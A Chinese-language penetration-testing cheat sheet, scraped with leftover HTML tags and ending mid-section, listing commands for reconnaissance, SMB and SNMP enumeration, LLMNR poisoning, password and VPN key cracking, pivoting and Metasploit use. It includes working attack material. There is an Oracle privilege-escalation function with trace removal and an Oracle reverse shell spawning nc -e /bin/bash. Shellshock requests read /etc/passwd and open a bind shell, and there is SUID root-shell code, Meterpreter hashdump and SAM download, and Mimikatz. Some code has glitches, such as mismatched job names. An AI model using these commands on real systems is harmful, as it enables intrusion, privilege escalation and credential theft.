渗透测试工具备忘录 - 详尽教学文档<\/h1>

1. 开始前的准备<\/h2>

1.1 网络配置<\/h3>
# 设置IP地址<\/span>
<\/span><\/span>ifconfig eth0 xxx.xxx.xxx.xxx\/24
<\/span><\/span>
<\/span><\/span># 子网划分<\/span>
<\/span><\/span>ipcalc xxx.xxx.xxx.xxx\/24
<\/span><\/span>ipcalc xxx.xxx.xxx.xxx 255.255.255.0
<\/span><\/span><\/code><\/pre>1.2 公开来源情报收集<\/h3>
DNS查询<\/h4>
# WHOIS查询<\/span>
<\/span><\/span>whois domain-name-here.com
<\/span><\/span>
<\/span><\/span># 查询DNS IP<\/span>
<\/span><\/span>dig a domain-name-here.com @nameserver
<\/span><\/span>
<\/span><\/span># 查询MX记录<\/span>
<\/span><\/span>dig mx domain-name-here.com @nameserver
<\/span><\/span>
<\/span><\/span># 用DIG查询域传送<\/span>
<\/span><\/span>dig axfr domain-name-here.com @nameserver
<\/span><\/span><\/code><\/pre>DNS域传送<\/h4>
# Windows DNS域传送<\/span>
<\/span><\/span>nslookup
<\/span><\/span>> set type=<\/span>any
<\/span><\/span>> ls -d blah.com
<\/span><\/span>
<\/span><\/span># Linux DNS域传送<\/span>
<\/span><\/span>dig axfr blah.com @ns1.blah.com
<\/span><\/span><\/code><\/pre>邮件枚举<\/h4>
git clone https:\/\/github.com\/killswitch-GUI\/SimplyEmail.git
<\/span><\/span>.\/SimplyEmail.py -all -e TARGET-DOMAIN
<\/span><\/span><\/code><\/pre>2. 信息收集<\/h2>
2.1 基本指纹识别<\/h3>
# 通过显示banner识别版本和指纹<\/span>
<\/span><\/span>nc -v 192.168.1.1 25<\/span>
<\/span><\/span>telnet 192.168.1.1 25<\/span>
<\/span><\/span>
<\/span><\/span># 使用NC抓取banner<\/span>
<\/span><\/span>nc TARGET-IP 80<\/span>
<\/span><\/span>GET \/ HTTP\/1.1
<\/span><\/span>Host: TARGET-IP
<\/span><\/span>User-Agent: Mozilla\/5.0
<\/span><\/span>Referrer: meh-domain
<\/span><\/span><enter>
<\/span><\/span><\/code><\/pre>2.2 DNS爆破<\/h3>
# DNSRecon DNS枚举<\/span>
<\/span><\/span>dnsrecon -d TARGET -D \/usr\/share\/wordlists\/dnsmap.txt -t std --xml ouput.xml
<\/span><\/span><\/code><\/pre>2.3 端口扫描<\/h3>
Nmap基本命令<\/h4>
nmap -v -sS -A -T4 target  # 详细显示,syn探测,高速扫描,系统和服务版本信息,脚本扫描和路由跟踪<\/span>
<\/span><\/span>nmap -v -sS -p- -A -T4 target  # 同上,且扫描所有TCP端口,耗时更长<\/span>
<\/span><\/span>nmap -v -sU -sS -p- -A -T4 target  # 同上,且扫描所有UDP端口,耗时巨长<\/span>
<\/span><\/span><\/code><\/pre>Nmap特殊扫描<\/h4>
# 扫描可能包含漏洞的SMB服务<\/span>
<\/span><\/span>nmap -v -p 445<\/span> --script=<\/span>smb-check-vulns --script-args=<\/span>unsafe=<\/span>1<\/span> 192.168.1.X
<\/span><\/span>
<\/span><\/span># 搜索nmap脚本<\/span>
<\/span><\/span>ls \/usr\/share\/nmap\/scripts\/* | grep ftp
<\/span><\/span><\/code><\/pre>UDP扫描<\/h4>
nmap -sU TARGET  # UDP协议扫描<\/span>
<\/span><\/span>
<\/span><\/span># 使用专用UDP扫描器<\/span>
<\/span><\/span>git clone https:\/\/github.com\/portcullislabs\/udp-proto-scanner.git
<\/span><\/span>.\/udp-protocol-scanner.pl -f ip.txt  # 扫描文件中IP地址的所有服务<\/span>
<\/span><\/span>.\/udp-proto-scanner.pl -p ntp -f ips.txt  # 扫描特定UDP服务<\/span>
<\/span><\/span><\/code><\/pre>2.4 其他主机发现方法<\/h3>
netdiscover -r 192.168.1.0\/24  # 利用ARP发现同网段的IP,MAC地址和MAC厂商<\/span>
<\/span><\/span><\/code><\/pre>3. 枚举和攻击网络服务<\/h2>
3.1 SMB\/Samba枚举<\/h3>
# SMB枚举工具<\/span>
<\/span><\/span>nmblookup -A target
<\/span><\/span>smbclient \/\/MOUNT\/share -I target -N
<\/span><\/span>rpcclient -U ""<\/span> target
<\/span><\/span>enum4linux target
<\/span><\/span>
<\/span><\/span># 寻找开放的SMB共享<\/span>
<\/span><\/span>smbclient -L \/\/192.168.1.100
<\/span><\/span>
<\/span><\/span># 枚举SMB共享<\/span>
<\/span><\/span>nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=<\/span>username,smbpass=<\/span>password -p445 192.168.1.0\/24
<\/span><\/span>
<\/span><\/span># 枚举SMB用户<\/span>
<\/span><\/span>nmap -sU -sS --script=<\/span>smb-enum-users -p U:137,T:139 192.168.11.200-254
<\/span><\/span>python \/usr\/share\/doc\/python-impacket-doc\/examples\/samrdump.py 192.168.XXX.XXX
<\/span><\/span>
<\/span><\/span># RID循环(RID Cycling)<\/span>
<\/span><\/span>ridenum.py 192.168.XXX.XXX 500<\/span> 50000<\/span> dict.txt
<\/span><\/span><\/code><\/pre>手动测试空会话<\/h4>
# Windows:<\/span>
<\/span><\/span>net use \\<\/span>TARGET\I<\/span>PC$ ""<\/span> \/u:""<\/span>
<\/span><\/span>
<\/span><\/span># Linux:<\/span>
<\/span><\/span>smbclient -L \/\/192.168.99.131
<\/span><\/span><\/code><\/pre>NBTScan<\/h4>
apt-get install nbtscan-unixwiz
<\/span><\/span>nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
<\/span><\/span><\/code><\/pre>3.2 LLMNR\/NBT-NS欺骗<\/h3>
使用Metasploit<\/h4>
# LLMNR\/NetBIOS请求欺骗\/毒化<\/span>
<\/span><\/span>auxiliary\/spoof\/llmnr\/llmnr_response
<\/span><\/span>auxiliary\/spoof\/nbns\/nbns_response
<\/span><\/span>
<\/span><\/span># 抓取哈希<\/span>
<\/span><\/span>auxiliary\/server\/capture\/smb
<\/span><\/span>auxiliary\/server\/capture\/http_ntlm
<\/span><\/span><\/code><\/pre>使用Responder<\/h4>
git clone https:\/\/github.com\/SpiderLabs\/Responder.git
<\/span><\/span>python Responder.py -i local-ip -I eth0
<\/span><\/span><\/code><\/pre>3.3 SNMP枚举<\/h3>
SNMP工具<\/h4>
# 美化SNMP输出<\/span>
<\/span><\/span>apt-get install snmp-mibs-downloader
<\/span><\/span>download-mibs
<\/span><\/span>echo ""<\/span> > \/etc\/snmp\/snmp.conf
<\/span><\/span>
<\/span><\/span># SNMP枚举命令<\/span>
<\/span><\/span>snmpcheck -t 192.168.1.X -c public
<\/span><\/span>snmpwalk -c public -v1 192.168.1.X 1<\/span> | grep hrSWRunName | cut -d -f
<\/span><\/span>snmpenum -t 192.168.1.X
<\/span><\/span>onesixtyone -c names -i hosts
<\/span><\/span><\/code><\/pre>SNMPv3枚举<\/h4>
# 识别SNMPv3服务器<\/span>
<\/span><\/span>nmap -sV -p 161<\/span> --script=<\/span>snmp-info TARGET-SUBNET
<\/span><\/span>
<\/span><\/span># 安装工具<\/span>
<\/span><\/span>apt-get install snmp snmp-mibs-downloader
<\/span><\/span>wget https:\/\/raw.githubusercontent.com\/raesene\/TestingScripts\/master\/snmpv3enum.rb
<\/span><\/span><\/code><\/pre>3.4 远程服务枚举<\/h3>
RSH枚举<\/h4>
# RSH运行命令<\/span>
<\/span><\/span>rsh <target> <command>
<\/span><\/span>
<\/span><\/span># RSH登陆扫描<\/span>
<\/span><\/span>auxiliary\/scanner\/rservices\/rsh_login
<\/span><\/span>
<\/span><\/span># 使用rusers显示已登陆用户<\/span>
<\/span><\/span>rusers -al 192.168.2.1
<\/span><\/span>
<\/span><\/span># 使用rlogin扫描整个子网<\/span>
<\/span><\/span>rlogin -l <user> <target>
<\/span><\/span><\/code><\/pre>Finger枚举<\/h4>
finger @TARGET-IP
<\/span><\/span>finger batman@TARGET-IP
<\/span><\/span><\/code><\/pre>3.5 TLS\/SSL测试<\/h3>
# 测试单一主机并将结果输出的HTML文件<\/span>
<\/span><\/span>.\/testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
<\/span><\/span><\/code><\/pre>4. 漏洞评估<\/h2>
4.1 OpenVAS安装<\/h3>
apt-get update
<\/span><\/span>apt-get dist-upgrade -y
<\/span><\/span>apt-get install openvas
<\/span><\/span>openvas-setup
<\/span><\/span><\/code><\/pre>检查OpenVAS运行状态：<\/p>
netstat -tulpn
<\/span><\/span><\/code><\/pre>通过 https:\/\/127.0.0.1:9392 登陆openvas<\/p>
5. 数据库渗透测试<\/h2>
5.1 Oracle测试<\/h3>
安装工具<\/h4>
apt-get install oscanner tnscmd10g
<\/span><\/span><\/code><\/pre>识别Oracle服务<\/h4>
# Oracle TNS版本指纹识别<\/span>
<\/span><\/span>tnscmd10g version -h TARGET
<\/span><\/span>nmap --script=<\/span>oracle-tns-version
<\/span><\/span>
<\/span><\/span># 爆破Oracle账户<\/span>
<\/span><\/span>nmap --script=<\/span>oracle-sid-brute
<\/span><\/span>nmap --script=<\/span>oracle-brute
<\/span><\/span><\/code><\/pre>Oracle权限提升<\/h4>

使用NMAP NSE脚本验证oracle数据库中的默认账户<\/li>
使用脆弱账号登陆<\/li>
确认oracle用户的权限级别<\/li>
<\/ol>
select<\/span> *<\/span> from<\/span> session_privs;
<\/span><\/span><\/code><\/pre>
创建提权函数<\/li>
<\/ol>
CREATE<\/span> OR<\/span> REPLACE<\/span> FUNCTION<\/span> GETDBA(FOO varchar) return<\/span> varchar deterministic<\/span> authid curren_user is<\/span> pragma autonomous_transaction; begin<\/span> execute<\/span> immediate<\/span> 'grant dba to user1 identified by pass1'<\/span>;commit<\/span>;return<\/span> 'FOO'<\/span>;end<\/span>;
<\/span><\/span><\/code><\/pre>
创建索引触发函数<\/li>
<\/ol>
create<\/span> index<\/span> exploit_1337 on<\/span> SYS.DUAL(SCOTT.GETDBA('BAR'<\/span>));
<\/span><\/span><\/code><\/pre>
验证权限<\/li>
<\/ol>
Select<\/span> *<\/span> from<\/span> session_privs;
<\/span><\/span><\/code><\/pre>
清除痕迹<\/li>
<\/ol>
drop<\/span> index<\/span> exploit_1337;
<\/span><\/span><\/code><\/pre>获取Oracle反弹shell<\/h4>
begin<\/span>
<\/span><\/span>dbms_scheduler.create_job(
<\/span><\/span> job_name =><\/span> 'MEH1337'<\/span>,
<\/span><\/span> job_type =><\/span> 'EXECUTABLE'<\/span>,
<\/span><\/span> job_action =><\/span> '\/bin\/nc'<\/span>,
<\/span><\/span> number_of_arguments =><\/span> 4<\/span>,
<\/span><\/span> start_date =><\/span> SYSTIMESTAMP,
<\/span><\/span> enabled =><\/span> FALSE<\/span>,
<\/span><\/span> auto_drop =><\/span> TRUE<\/span>);
<\/span><\/span> 
<\/span><\/span>dbms_scheduler.set_job_argument_value('rev_shell'<\/span>, 1<\/span>, 'TARGET-IP'<\/span>);
<\/span><\/span>dbms_scheduler.set_job_argument_value('rev_shell'<\/span>, 2<\/span>, '443'<\/span>);
<\/span><\/span>dbms_scheduler.set_job_argument_value('rev_shell'<\/span>, 3<\/span>, '-e'<\/span>);
<\/span><\/span>dbms_scheduler.set_job_argument_value('rev_shell'<\/span>, 4<\/span>, '\/bin\/bash'<\/span>);
<\/span><\/span>dbms_scheduler.enable('rev_shell'<\/span>);
<\/span><\/span>end<\/span>;
<\/span><\/span><\/code><\/pre>5.2 MSSQL测试<\/h3>
枚举\/发现<\/h4>
nmap -sU --script=<\/span>ms-sql-info 192.168.1.108 192.168.1.156
<\/span><\/span><\/code><\/pre>Metasploit模块<\/h4>
use auxiliary\/scanner\/mssql\/mssql_ping
<\/span><\/span>use auxiliary\/admin\/mssql\/mssql_enum
<\/span><\/span><\/code><\/pre>Metasploit获取Shell<\/h4>
use exploit\/windows\/mssql\/mssql_payload
<\/span><\/span>set PAYLOAD windows\/meterpreter\/reverse_tcp
<\/span><\/span><\/code><\/pre>6. 网络隧道与跳板<\/h2>
6.1 Plink.exe隧道<\/h3>
# 转发运程端口到本地地址<\/span>
<\/span><\/span>plink.exe -P 22<\/span> -l root -pw "1337"<\/span> -R 445:127.0.0.1:445 REMOTE-IP
<\/span><\/span><\/code><\/pre>6.2 SSH跳板<\/h3>
# 一级跳板<\/span>
<\/span><\/span>ssh -D 127.0.0.1:1010 -p 22<\/span> user@pivot-target-ip
<\/span><\/span>
<\/span><\/span># 在\/etc\/proxychains.conf添加<\/span>
<\/span><\/span>sock4 127.0.0.1 1010<\/span>
<\/span><\/span>
<\/span><\/span># 二级跳板<\/span>
<\/span><\/span>proxychains ssh -D 127.0.0.1:1011 -p 22<\/span> user1@ip-address-2
<\/span><\/span>
<\/span><\/span># 在\/etc\/proxychains.conf添加<\/span>
<\/span><\/span>sock4 127.0.0.1 1011<\/span>
<\/span><\/span><\/code><\/pre>6.3 Meterpreter跳板<\/h3>
portfwd add –l 3389<\/span> –p 3389<\/span> –r target  # 端口转发<\/span>
<\/span><\/span>portfwd delete –l 3389<\/span> –p 3389<\/span> –r target  # 删除端口转发<\/span>
<\/span><\/span><\/code><\/pre>7. 网络基础知识<\/h2>
7.1 TTL指纹识别<\/h3>



操作系统<\/th>
TTL值<\/th>
<\/tr>
<\/thead>


Windows<\/td>
128<\/td>
<\/tr>

Linux<\/td>
64<\/td>
<\/tr>

Solaris<\/td>
255<\/td>
<\/tr>

Cisco\/Network<\/td>
255<\/td>
<\/tr>
<\/tbody>
<\/table>
7.2 IPv4速查<\/h3>
各类IP地址范围<\/h4>



类别<\/th>
IP地址范围<\/th>
<\/tr>
<\/thead>


A类<\/td>
0.0.0.0 - 127.255.255.255<\/td>
<\/tr>

B类<\/td>
128.0.0.0 - 191.255.255.255<\/td>
<\/tr>

C类<\/td>
192.0.0.0 - 223.255.255.255<\/td>
<\/tr>

D类<\/td>
224.0.0.0 - 239.255.255.255<\/td>
<\/tr>

E类<\/td>
240.0.0.0 - 255.255.255.255<\/td>
<\/tr>
<\/tbody>
<\/table>
IPv4私有地址<\/h4>



类别<\/th>
范围<\/th>
<\/tr>
<\/thead>


A类私有地址<\/td>
10.0.0.0 - 10.255.255.255<\/td>
<\/tr>

B类私有地址<\/td>
172.16.0.0 - 172.31.255.255<\/td>
<\/tr>

C类私有地址<\/td>
192.168.0.0 - 192.168.255.255<\/td>
<\/tr>
<\/tbody>
<\/table>
7.3 IPv4子网速查表<\/h3>



CIDR<\/th>
十进制掩码<\/th>
主机数量<\/th>
<\/tr>
<\/thead>


\/31<\/td>
255.255.255.254<\/td>
1 Host<\/td>
<\/tr>

\/30<\/td>
255.255.255.252<\/td>
2 Hosts<\/td>
<\/tr>

...<\/td>
...<\/td>
...<\/td>
<\/tr>

\/24<\/td>
255.255.255.0<\/td>
254 Hosts<\/td>
<\/tr>

...<\/td>
...<\/td>
...<\/td>
<\/tr>

\/8<\/td>
255.0.0.0<\/td>
16777214 Hosts<\/td>
<\/tr>
<\/tbody>
<\/table>
8. 高级攻击技术<\/h2>
8.1 VLAN跳跃攻击<\/h3>
git clone https:\/\/github.com\/nccgroup\/vlan-hopping.git
<\/span><\/span>chmod 700<\/span> frogger.sh
<\/span><\/span>.\/frogger.sh
<\/span><\/span><\/code><\/pre>8.2 VPN测试<\/h3>
识别VPN服务器<\/h4>
.\/udp-protocol-scanner.pl -p ike TARGET(<\/span>s)<\/span>
<\/span><\/span>.\/udp-protocol-scanner.pl -p ike -f ip.txt
<\/span><\/span><\/code><\/pre>IKEForce工具<\/h4>
pip install pyip
<\/span><\/span>git clone https:\/\/github.com\/SpiderLabs\/ikeforce.git
<\/span><\/span>
<\/span><\/span># 枚举VPN组名<\/span>
<\/span><\/span>.\/ikeforce.py TARGET-IP –e –w wordlists\/groupnames.dic
<\/span><\/span>
<\/span><\/span># 爆破VPN<\/span>
<\/span><\/span>.\/ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1<\/span>
<\/span><\/span><\/code><\/pre>IKE扫描<\/h4>
ike-scan TARGET-IP
<\/span><\/span>ike-scan -A TARGET-IP
<\/span><\/span>ike-scan -A TARGET-IP --id=<\/span>myid -P TARGET-IP-key
<\/span><\/span><\/code><\/pre>IKE激进模式PSK破解流程<\/h4>

验证IKE服务器<\/li>
<\/ol>
.\/udp-protocol-scanner.pl -p ike SUBNET\/24
<\/span><\/span><\/code><\/pre>
枚举组名<\/li>
<\/ol>
.\/ikeforce.py TARGET-IP –e –w wordlists\/groupnames.dic
<\/span><\/span><\/code><\/pre>
抓取PSK哈希<\/li>
<\/ol>
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
<\/span><\/span><\/code><\/pre>
破解PSK哈希<\/li>
<\/ol>
psk-crack hash-file.txt
<\/span><\/span>
<\/span><\/span># 高级选项<\/span>
<\/span><\/span>pskcrack
<\/span><\/span>psk-crack -b 5<\/span> TARGET-IPkey
<\/span><\/span>psk-crack -b 5<\/span> --charset=<\/span>"01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"<\/span> 192-168-207-134key
<\/span><\/span>psk-crack -d \/path\/to\/dictionary-file TARGET-IP-key
<\/span><\/span><\/code><\/pre>8.3 PPTP攻击<\/h3>
# 验证PPTP服务<\/span>
<\/span><\/span>nmap –Pn -sV -p 1723<\/span> TARGET(<\/span>S)<\/span>
<\/span><\/span>
<\/span><\/span># PPTP字典攻击<\/span>
<\/span><\/span>thc-pptp-bruter -u hansolo -W -w \/usr\/share\/wordlists\/nmap.lst
<\/span><\/span><\/code><\/pre>8.4 DNS隧道<\/h3>
攻击机器设置<\/h4>
apt-get update
<\/span><\/span>apt-get -y install ruby-dev git make g++
<\/span><\/span>gem install bundler
<\/span><\/span>git clone https:\/\/github.com\/iagox86\/dnscat2.git
<\/span><\/span>cd dnscat2\/server
<\/span><\/span>bundle install
<\/span><\/span>
<\/span><\/span># 运行dnscat2<\/span>
<\/span><\/span>ruby .\/dnscat2.rb
<\/span><\/span>dnscat2> New session established: 1422<\/span>
<\/span><\/span>dnscat2> session -i 1422<\/span>
<\/span><\/span><\/code><\/pre>目标机器<\/h4>
dnscat --host <dnscat server_ip>
<\/span><\/span><\/code><\/pre>9. 漏洞利用<\/h2>
9.1 Exploit搜索<\/h3>
# 从exploit-db搜索<\/span>
<\/span><\/span>searchsploit windows 2003<\/span> | grep -i local
<\/span><\/span>
<\/span><\/span># Google搜索<\/span>
<\/span><\/span>site:exploit-db.com exploit kernel <=<\/span> 3<\/span>
<\/span><\/span>
<\/span><\/span># 搜索metasploit模块<\/span>
<\/span><\/span>grep -R "W7"<\/span> \/usr\/share\/metasploit-framework\/modules\/exploit\/windows\/*
<\/span><\/span>
<\/span><\/span># 本地exploit-db搜索<\/span>
<\/span><\/span>searchsploit –u
<\/span><\/span>searchsploit apache 2.2
<\/span><\/span>searchsploit "Linux Kernel"<\/span>
<\/span><\/span>searchsploit linux 2.6 | grep -i ubuntu | grep local
<\/span><\/span><\/code><\/pre>9.2 交叉编译Exploits<\/h3>
在Kali上编译Windows的exp<\/h4>
wget -O mingw-get-setup.exe http:\/\/sourceforge.net\/projects\/mingw\/files\/Installer\/mingw-get-setup.exe\/download
<\/span><\/span>wine mingw-get-setup.exe
<\/span><\/span>select<\/span> mingw32-base
<\/span><\/span>cd \/root\/.wine\/drive_c\/windows
<\/span><\/span>wget http:\/\/gojhonny.com\/misc\/mingw_bin.zip &&<\/span> unzip mingw_bin.zip
<\/span><\/span>cd \/root\/.wine\/drive_c\/MinGW\/bin
<\/span><\/span>wine gcc -o ability.exe \/tmp\/exploit.c -lwsock32
<\/span><\/span>wine ability.exe
<\/span><\/span><\/code><\/pre>通用交叉编译<\/h4>
gcc -m32 -o output32 hello.c  # 32位<\/span>
<\/span><\/span>gcc -m64 -o output hello.c  # 64位<\/span>
<\/span><\/span><\/code><\/pre>9.3 利用Shellshock漏洞<\/h3>
git clone https:\/\/github.com\/nccgroup\/shocker
<\/span><\/span>.\/shocker.py -H TARGET --command "\/bin\/cat \/etc\/passwd"<\/span> -c \/cgi-bin\/status --verbose
<\/span><\/span>
<\/span><\/span># 查看文件内容<\/span>
<\/span><\/span>echo -e "HEAD \/cgi-bin\/status HTTP\/1.1\r\nUser-Agent:echo \$(<\/etc\/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"<\/span> | nc TARGET 80<\/span>
<\/span><\/span>
<\/span><\/span># 运行bind shell<\/span>
<\/span><\/span>echo -e "HEAD \/cgi-bin\/status HTTP\/1.1\r\nUser-Agent:usr\/bin\/nc -l -p 9999 -e \/bin\/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n"<\/span> | nc TARGET 80<\/span>
<\/span><\/span>
<\/span><\/span># 反弹shell<\/span>
<\/span><\/span>nc -l -p 443<\/span>
<\/span><\/span><\/code><\/pre>10. 实用工具与技巧<\/h2>
10.1 本地Web服务器<\/h3>
python -m SimpleHTTPServer 80<\/span>  # Python2<\/span>
<\/span><\/span>python3 -m http.server  # Python3<\/span>
<\/span><\/span>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"<\/span>  # Ruby<\/span>
<\/span><\/span>php -S 0.0.0.0:80  # PHP<\/span>
<\/span><\/span><\/code><\/pre>10.2 挂载文件共享<\/h3>
# 挂载NFS共享<\/span>
<\/span><\/span>mount 192.168.1.1:\/vol\/share \/mnt\/nfs
<\/span><\/span>
<\/span><\/span># 挂载Windows共享<\/span>
<\/span><\/span>mount -t cifs -o username=<\/span>user,password=<\/span>pass,domain=<\/span>blah \/\/192.168.1.X\/share-name \/mnt\/cifs
<\/span><\/span>
<\/span><\/span># Windows挂载共享<\/span>
<\/span><\/span>net use Z: \\<\/span>win-server\s<\/span>hare password \/user:domain\j<\/span>anedoe \/savecred \/p:no
<\/span><\/span>
<\/span><\/span># 安装smb4k<\/span>
<\/span><\/span>apt-get install smb4k -y
<\/span><\/span><\/code><\/pre>10.3 HTTP\/HTTPS Web服务枚举<\/h3>
nikto -h 192.168.1.1  # 对目标使用nikto进行扫描<\/span>
<\/span><\/span>dirbuster  # 使用GUI配置<\/span>
<\/span><\/span><\/code><\/pre>10.4 数据包侦测<\/h3>
tcpdump tcp port 80<\/span> -w output.pcap -i eth0  # 将网卡eth0的80端口的流量导出到output.pcap<\/span>
<\/span><\/span><\/code><\/pre>10.5 用户名枚举<\/h3>
SMB用户枚举<\/h4>
python \/usr\/share\/doc\/python-impacket-doc\/examples\/samrdump.py 192.168.XXX.XXX
<\/span><\/span>ridenum.py 192.168.XXX.XXX 500<\/span> 50000<\/span> dict.txt
<\/span><\/span><\/code><\/pre>SNMP用户枚举<\/h4>
snmpwalk public -v1 192.168.X.XXX 1<\/span> | grep 77.1.2.25 | cut -d" "<\/span> -f4
<\/span><\/span>python \/usr\/share\/doc\/python-impacket-doc\/examples\/samrdump.py SNMP 192.168.X.XXX
<\/span><\/span>nmap -sT -p 161<\/span> 192.168.X.XXX\/254 -oG snmp_results.txt  # 然后grep结果<\/span>
<\/span><\/span><\/code><\/pre>10.6 密码字典<\/h3>
\/usr\/share\/wordlists  # Kali的字典存放路径<\/span>
<\/span><\/span><\/code><\/pre>11. 密码破解<\/h2>
11.1 Hydra爆破<\/h3>
爆破FTP<\/h4>
hydra -l USERNAME -P \/usr\/share\/wordlistsnmap.lst -f 192.168.X.XXX ftp -V
<\/span><\/span><\/code><\/pre>爆破POP3<\/h4>
hydra -l USERNAME -P \/usr\/share\/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V
<\/span><\/span><\/code><\/pre>爆破SMTP<\/h4>
hydra -P \/usr\/share\/wordlistsnmap.lst 192.168.X.XXX smtp -V
<\/span><\/span><\/code><\/pre>11.2 John The Ripper (JTR)<\/h3>
john --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt hashes  # 使用字典破解<\/span>
<\/span><\/span>john --format=<\/span>descrypt --wordlist \/usr\/share\/wordlists\/rockyou.txt hash.txt  # 指定哈希类型<\/span>
<\/span><\/span>john --format=<\/span>descrypt hash --show  # 显示破解结果<\/span>
<\/span><\/span><\/code><\/pre>12. Linux渗透测试技巧<\/h2>
12.1 SUID二进制<\/h3>
C代码示例<\/h4>
\/\/ 运行\/bin\/bash的SUID C Shell
<\/span><\/span><\/span><\/span>int<\/span> main<\/span>(void<\/span>){
<\/span><\/span> setresuid(0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span> system("\/bin\/bash"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 运行\/bin\/sh的SUID C Shell
<\/span><\/span><\/span><\/span>int<\/span> main<\/span>(void<\/span>){
<\/span><\/span> setresuid(0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span> system("\/bin\/sh"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译<\/h4>
gcc -o suid suid.c  # 32位<\/span>
<\/span><\/span>gcc -m32 -o suid suid.c  # 64位系统编译32位<\/span>
<\/span><\/span><\/code><\/pre>12.2 TTY Shell技巧<\/h3>
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>  # Python<\/span>
<\/span><\/span>echo os.system(<\/span>'\/bin\/bash'<\/span>)<\/span>  # sh<\/span>
<\/span><\/span>\/bin\/sh -i  # sh交互式<\/span>
<\/span><\/span>perl —e 'exec "\/bin\/sh";'<\/span>  # Perl<\/span>
<\/span><\/span>exec "\/bin\/sh"<\/span>  # Ruby<\/span>
<\/span><\/span>os.execute(<\/span>'\/bin\/sh'<\/span>)<\/span>  # Lua<\/span>
<\/span><\/span>:!bash  # 从Vi<\/span>
<\/span><\/span>!sh  # NMAP<\/span>
<\/span><\/span><\/code><\/pre>13. Metasploit速查表<\/h2>
13.1 Meterpreter Payloads<\/h3>
set payload windows\/meterpreter\/reverse_tcp  # Windows反向tcp<\/span>
<\/span><\/span>set payload windows\/vncinject\/reverse_tcp  # Windows VNC<\/span>
<\/span><\/span>set ViewOnly false  # VNC可交互<\/span>
<\/span><\/span>set payload linux\/meterpreter\/reverse_tcp  # Linux反向<\/span>
<\/span><\/span><\/code><\/pre>13.2 Meterpreter命令<\/h3>
upload file c:\\<\/span>windows  # 上传文件<\/span>
<\/span><\/span>download c:\\<\/span>windows\\<\/span>repair\\<\/span>sam \/tmp  # 下载文件<\/span>
<\/span><\/span>execute -f c:\\<\/span>windows\t<\/span>emp\e<\/span>xploit.exe  # 执行文件<\/span>
<\/span><\/span>execute -f cmd -c  # 创建新cmd shell<\/span>
<\/span><\/span>ps  # 显示进程<\/span>
<\/span><\/span>shell  # 获取目标shell<\/span>
<\/span><\/span>getsystem  # 尝试提权<\/span>
<\/span><\/span>hashdump  # 导出哈希<\/span>
<\/span><\/span><\/code><\/pre>13.3 常用Metasploit模块<\/h3>
远程Windows漏洞<\/h4>
use exploit\/windows\/smb\/ms08_067_netapi  # MS08_067 Windows 2k, XP, 2003<\/span>
<\/span><\/span>use exploit\/windows\/dcerpc\/ms06_040_netapi  # MS08_040 Windows NT, 2k, XP, 2003<\/span>
<\/span><\/span>use exploit\/windows\/smb\/ms09_050_smb2_negotiate_func_index  # MS09_050 Windows Vista SP1\/SP2和Server 2008<\/span>
<\/span><\/span><\/code><\/pre>本地Windows漏洞<\/h4>
use exploit\/windows\/local\/bypassuac  # 绕过Windows 7 UAC<\/span>
<\/span><\/span><\/code><\/pre>辅助模块<\/h4>
use auxiliary\/scanner\/http\/dir_scanner  # HTTP目录扫描<\/span>
<\/span><\/span>use auxiliary\/scanner\/http\/jboss_vulnscan  # JBOSS漏扫<\/span>
<\/span><\/span>use auxiliary\/scanner\/mssql\/mssql_login  # MSSQL认证扫描<\/span>
<\/span><\/span>use auxiliary\/scanner\/mysql\/mysql_version  # MySQL版本扫描<\/span>
<\/span><\/span>use auxiliary\/scanner\/oracle\/oracle_login  # Oracle登陆<\/span>
<\/span><\/span><\/code><\/pre>Powershell模块<\/h4>
use exploit\/multi\/script\/web_delivery  # powershell payload传送<\/span>
<\/span><\/span>use post\/windows\/manage\/powershell\/exec_powershell  # 上传执行powershell脚本<\/span>
<\/span><\/span>use exploit\/multi\/http\/jboss_maindeployer  # JBOSS部署<\/span>
<\/span><\/span>use exploit\/windows\/mssql\/mssql_payload  # MSSQL payload<\/span>
<\/span><\/span><\/code><\/pre>Windows后渗透模块<\/h4>
run post\/windows\/gather\/win_privs  # 显示当前用户权限<\/span>
<\/span><\/span>use post\/windows\/gather\/credentials\/gpp  # 提取GPP保存的密码<\/span>
<\/span><\/span>load mimikatz -> wdigest  # 加载Mimikatz<\/span>
<\/span><\/span>run post\/windows\/gather\/local_admin_search_enum  # 检查域内管理员权限<\/span>
<\/span><\/span>run post\/windows\/gather\/smart_hashdump  # 自动化导出sam文件<\/span>
<\/span><\/span><\/code><\/pre>14. SQLMap示例<\/h2>
# 自动化扫描<\/span>
<\/span><\/span>sqlmap -u meh.com --forms --batch --crawl=<\/span>10<\/span> --cookie=<\/span>jsessionid=<\/span>54321<\/span> --level=<\/span>5<\/span> --risk=<\/span>3<\/span>
<\/span><\/span>
<\/span><\/span># 指定目标扫描<\/span>
<\/span><\/span>sqlmap -u TARGET -p PARAM --data=<\/span>POSTDATA --cookie=<\/span>COOKIE --level=<\/span>3<\/span> --current-user --current-db --passwords --file-read=<\/span>"\/var\/www\/blah.php"<\/span>
<\/span><\/span>
<\/span><\/span># 使用联合查询技术扫描mysql<\/span>
<\/span><\/span>sqlmap -u "meh.com\/meh.php?id=1"<\/span> --dbms=<\/span>mysql --tech=<\/span>U --random-agent --dump
<\/span><\/span>
<\/span><\/span># 检测表单注入点<\/span>
<\/span><\/span>sqlmap -o -u "meh.com\/form\/"<\/span> --forms
<\/span><\/span>
<\/span><\/span># 导出指定数据库表<\/span>
